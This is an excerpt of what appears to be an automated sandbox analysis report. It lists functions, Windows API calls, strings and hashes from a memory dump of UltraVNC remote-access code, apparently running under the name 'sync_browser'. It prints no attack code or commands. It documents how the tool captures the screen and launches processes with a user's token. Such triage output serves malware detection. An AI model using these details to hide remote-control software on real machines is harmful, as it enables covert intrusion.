String ID: Shell_TrayWnd
API String ID: 1145045407-2988720461
Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
Instruction ID: 6fe1625e78ded9189fce8fd3e50f442f8d6819016b14c19a2500e9aa1c399777
Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
Instruction Fuzzy Hash: 9F617132A0C682C5EB20BF21D4402A9A7A4FF48798F844535EA5D4BBADEF7DF545C720

Function 00007FF740018390 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 135filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF7400183CA
CreateFileA.KERNEL32 ref: 00007FF7400183F7
GetFileSize.KERNEL32 ref: 00007FF740018462
GetFileSize.KERNEL32 ref: 00007FF740018470
GetFileTime.KERNEL32 ref: 00007FF7400184A6
GetFileTime.KERNEL32 ref: 00007FF7400184C1
CompareFileTime.KERNEL32 ref: 00007FF7400184D7
CreateFileMappingA.KERNEL32 ref: 00007FF74001851E
MapViewOfFile.KERNEL32 ref: 00007FF740018544
CloseHandle.KERNEL32 ref: 00007FF740018550
CloseHandle.KERNEL32 ref: 00007FF740018559

Strings

c:\video1.dat, xrefs: 00007FF7400183D9
videodriver.cpp : Error video.dat , xrefs: 00007FF74001856A
c:\video0.dat, xrefs: 00007FF7400183B2

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$CreateTime$CloseHandleSize$CompareMappingView
String ID: c:\video0.dat$c:\video1.dat$videodriver.cpp : Error video.dat
API String ID: 286203867-3102623397
Opcode ID: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
Instruction ID: a19b933aac20da1c49d71b62ad6fb14be7774d33bf6d79f99edb84ce4445611e
Opcode Fuzzy Hash: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
Instruction Fuzzy Hash: D5517021A0DA46C6EA70BB25A504669A391AF85BB4FD40335DE3D07BF8EE3CF545C720

Function 00007FF74000D560 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 128processthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF74000D5A2
FindWindowA.USER32 ref: 00007FF74000D675
GetWindowThreadProcessId.USER32 ref: 00007FF74000D690
OpenProcess.KERNEL32 ref: 00007FF74000D6AB
OpenProcessToken.ADVAPI32 ref: 00007FF74000D6CA
CreateProcessAsUserA.ADVAPI32 ref: 00007FF74000D70C
GetLastError.KERNEL32 ref: 00007FF74000D712
CloseHandle.KERNEL32 ref: 00007FF74000D71D
CloseHandle.KERNEL32 ref: 00007FF74000D72D
CloseHandle.KERNEL32 ref: 00007FF74000D73D
CloseHandle.KERNEL32 ref: 00007FF74000D74D

Strings

-settingshelper, xrefs: 00007FF74000D5CF
Winsta0\Default, xrefs: 00007FF74000D64E
Shell_TrayWnd, xrefs: 00007FF74000D655

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
API String ID: 421869683-3362258117
Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
Instruction ID: 9411684535f7865a6e6aa20816b38f234847a863b5013594f46040b51bd38d0a
Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
Instruction Fuzzy Hash: 2C518231A1CB45C5EB14AF21F8446A9B7A4FF45790F844236EAAD43BA8DF3CE505C760

Function 00007FF740003C70 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetClipBox.GDI32 ref: 00007FF740003CC9
IsRectEmpty.USER32 ref: 00007FF740003CDC
CreateCompatibleDC.GDI32 ref: 00007FF740003CF5
CreateSolidBrush.GDI32 ref: 00007FF740003D11
SelectObject.GDI32 ref: 00007FF740003D31
PatBlt.GDI32 ref: 00007FF740003D7F
SelectObject.GDI32 ref: 00007FF740003D8F
StretchBlt.GDI32 ref: 00007FF740003DD8
SelectObject.GDI32 ref: 00007FF740003DE4
SelectObject.GDI32 ref: 00007FF740003DF0
DeleteObject.GDI32 ref: 00007FF740003E09
DeleteDC.GDI32 ref: 00007FF740003E1A

Part of subcall function 00007FF740003A90: GetModuleFileNameA.KERNEL32 ref: 00007FF740003AB6

Strings

!, xrefs: 00007FF740003D72
, xrefs: 00007FF740003DA3

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Object$Select$CreateDelete$BrushClipCompatibleEmptyFileModuleNameRectSolidStretch
String ID: $!
API String ID: 844750580-2056089098
Opcode ID: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
Instruction ID: b35c0fb78b4e3b9bb01b6c4b2021031ab10da3ba8d65ee0cc979c1ea8fb6d032
Opcode Fuzzy Hash: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
Instruction Fuzzy Hash: 68412B3560C682C6EA65BB11B81477AB7A4FF89B94F844234DD5E47BA8DF3CF4448B20

Function 00007FF740006E00 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 104registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00007FF740006300), ref: 00007FF740006E32
RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,00007FF740006300), ref: 00007FF740006E6B
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00007FF740006300), ref: 00007FF740006F9E

Part of subcall function 00007FF7400B7978: malloc.LIBCMT ref: 00007FF7400B7992

RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,00007FF740006300), ref: 00007FF740006EB7
lstrlenA.KERNEL32 ref: 00007FF740006F64
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00007FF740006300), ref: 00007FF740006F87

Strings

ProductSuite, xrefs: 00007FF740006E54, 00007FF740006EA3
SBS, xrefs: 00007FF740006EFC
Personal, xrefs: 00007FF740006F3E
Small Business, xrefs: 00007FF740006F0F
System\CurrentControlSet\Control\ProductOptions, xrefs: 00007FF740006E0F
@, xrefs: 00007FF740006F51
Enterprise, xrefs: 00007FF740006F22
Terminal Server, xrefs: 00007FF740006EE0

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseQueryValue$Openlstrlenmalloc
String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
API String ID: 1137168859-3840687832
Opcode ID: 54218e6667a4a9405651accdc3d5de267d2fa430744b7c07ceec9064bf014568
Instruction ID: c939408589478592f34954317c1b65852fbd0029e5c3eaeca208be7d1c499b02
Opcode Fuzzy Hash: 54218e6667a4a9405651accdc3d5de267d2fa430744b7c07ceec9064bf014568
Instruction Fuzzy Hash: 06411531A0C647C2EA10BB21B5402BAA7A5FF85BD4F844035EA8D56B7DDF2CF155CB60

Function 00007FF7400C1630 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF7400C1651
_errno.LIBCMT ref: 00007FF7400C165C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C1667
_getdrive.LIBCMT ref: 00007FF7400C1671
_errno.LIBCMT ref: 00007FF7400C1681
GetFullPathNameA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7400C1783,?,?,?), ref: 00007FF7400C16C8
_errno.LIBCMT ref: 00007FF7400C16E0

Strings

:., xrefs: 00007FF7400C169F
., xrefs: 00007FF7400C16B2

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
String ID: .$:.
API String ID: 2522281643-2811378331
Opcode ID: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
Instruction ID: ff8e06bc2a2888ee0431acb976af46f02149bda3833552d0a358df4f123707e0
Opcode Fuzzy Hash: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
Instruction Fuzzy Hash: 4B314D22A0C242C6FB697BA494003BDA6A0AF86744FD94135EB4C467EADF7CF8419771

Function 00007FF7400309F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

SetRect.USER32 ref: 00007FF740030A2D
SetTextColor.GDI32 ref: 00007FF740030A3F
SetBkColor.GDI32 ref: 00007FF740030A54
CreateSolidBrush.GDI32 ref: 00007FF740030A62
SelectObject.GDI32 ref: 00007FF740030A79
FillRect.USER32 ref: 00007FF740030A9A
DrawTextA.USER32 ref: 00007FF740030AC1
SetBkColor.GDI32 ref: 00007FF740030AD1
SetTextColor.GDI32 ref: 00007FF740030AE1
SelectObject.GDI32 ref: 00007FF740030AF1
DeleteObject.GDI32 ref: 00007FF740030AFA
GdiFlush.GDI32 ref: 00007FF740030B22

Part of subcall function 00007FF740031540: GetDIBits.GDI32 ref: 00007FF7400315C1

Strings

x, xrefs: 00007FF740030A25
UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF740030AAC

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
API String ID: 3190128964-2508378015
Opcode ID: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
Instruction ID: df06870073bbf2b2af8524d66b86cb15e3d32fd3967436a2b8c7fa87234d0f7d
Opcode Fuzzy Hash: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
Instruction Fuzzy Hash: C531123660C686D6E700BF6AE45456AB361FF89B98F440032EE5E47728DF7CE445CB20

Function 00007FF740019C30 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 300COMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32 ref: 00007FF740019DF1
CombineRgn.GDI32 ref: 00007FF740019E0D
DeleteObject.GDI32 ref: 00007FF740019E16
free.LIBCMT ref: 00007FF740019E1F

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

CreateRectRgn.GDI32 ref: 00007FF740019F4A
CombineRgn.GDI32 ref: 00007FF740019F63
DeleteObject.GDI32 ref: 00007FF740019F6C
free.LIBCMT ref: 00007FF740019F75
CreateRectRgn.GDI32 ref: 00007FF74001A08A
CombineRgn.GDI32 ref: 00007FF74001A0A6
DeleteObject.GDI32 ref: 00007FF74001A0AF
free.LIBCMT ref: 00007FF74001A0B8

Part of subcall function 00007FF7400B92A4: malloc.LIBCMT ref: 00007FF7400B92C7

Strings

vistahook.cpp : REct %i %i %i %i , xrefs: 00007FF740019D1B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CombineCreateDeleteObjectRectfree$ErrorFreeHeapLast_errnomalloc
String ID: vistahook.cpp : REct %i %i %i %i
API String ID: 1305454473-3781348997
Opcode ID: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
Instruction ID: f08612e0f41b372bccd3bd9e5855db3025e8681cb870ffca16b5a9bcd6795ba9
Opcode Fuzzy Hash: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
Instruction Fuzzy Hash: 00E15976B08691CEE710EF69D4846ACB7F5FB48B88F404026DE4E93B28DB39E454CB51

Function 00007FF740036D40 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 226threadtimeCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF740036DCF
CreateThread.KERNEL32 ref: 00007FF740036F11
timeGetTime.WINMM ref: 00007FF740036F38
CreateRectRgn.GDI32 ref: 00007FF740037052
CombineRgn.GDI32 ref: 00007FF74003706B
DeleteObject.GDI32 ref: 00007FF740037074
free.LIBCMT ref: 00007FF74003707D
GetForegroundWindow.USER32 ref: 00007FF7400370B1
GetCursorPos.USER32 ref: 00007FF7400370FD
WindowFromPoint.USER32 ref: 00007FF74003710C
GetDesktopWindow.USER32 ref: 00007FF74003711F

Part of subcall function 00007FF7400B7DE8: _errno.LIBCMT ref: 00007FF7400B7E00
Part of subcall function 00007FF7400B7DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7E0C

Strings

w8hook, xrefs: 00007FF740036EC2
schook, xrefs: 00007FF740036D94

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
String ID: schook$w8hook
API String ID: 2828954817-2864610768
Opcode ID: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
Instruction ID: 4682bb0146a826997d17208cbc33cb4110cf8fdfa6bd577bc31212ac350c5a45
Opcode Fuzzy Hash: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
Instruction Fuzzy Hash: FDB1403660CB86C6EB65BF25E5405E9B7A0FB44B84F848036CA9D43769CF78F485C321

Function 00007FF740015550 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 162windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF7400155A5

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

Part of subcall function 00007FF7400170B0: EnumDisplaySettingsA.USER32 ref: 00007FF7400170F4
Part of subcall function 00007FF7400170B0: LoadLibraryA.KERNEL32 ref: 00007FF740017109
Part of subcall function 00007FF7400170B0: GetProcAddress.KERNEL32 ref: 00007FF74001712D
Part of subcall function 00007FF7400170B0: FreeLibrary.KERNEL32 ref: 00007FF7400171F2

malloc.LIBCMT ref: 00007FF7400155AF
GetDC.USER32 ref: 00007FF740015611
GetSystemPaletteEntries.GDI32 ref: 00007FF74001563B
GetLastError.KERNEL32 ref: 00007FF740015644
DeleteDC.GDI32 ref: 00007FF740015675
ReleaseDC.USER32 ref: 00007FF740015682

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF74001561C
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF74001564A
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7400155BD
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF74001557A
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF74001577E
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF740015603

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
Instruction ID: 9558dfd3233c10f4d71ea6564156aa126e4990a8052f16c2e44999f5bd983c6e
Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
Instruction Fuzzy Hash: 8D510762A1D582C1E719FB25A8502F8A391EF45745FC44039ED4E4B7A9EE3DF105C760

Function 00007FF740014970 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 77threadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF7400149A5
GetCurrentThreadId.KERNEL32 ref: 00007FF7400149CF
GetThreadDesktop.USER32 ref: 00007FF7400149D7
GetUserObjectInformationA.USER32 ref: 00007FF740014A06
SetThreadDesktop.USER32 ref: 00007FF740014A4C
DialogBoxParamA.USER32 ref: 00007FF740014A86
SetThreadDesktop.USER32 ref: 00007FF740014A8F
CloseDesktop.USER32 ref: 00007FF740014A9D

Strings

TextChat.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF740014A56
TextChat.cpp : OpenInputdesktop Error , xrefs: 00007FF7400149B7
TextChat.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF740014A2A
TextChat.cpp : OpenInputdesktop OK, xrefs: 00007FF7400149C3
TextChat.cpp : !GetUserObjectInformation , xrefs: 00007FF740014A10

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

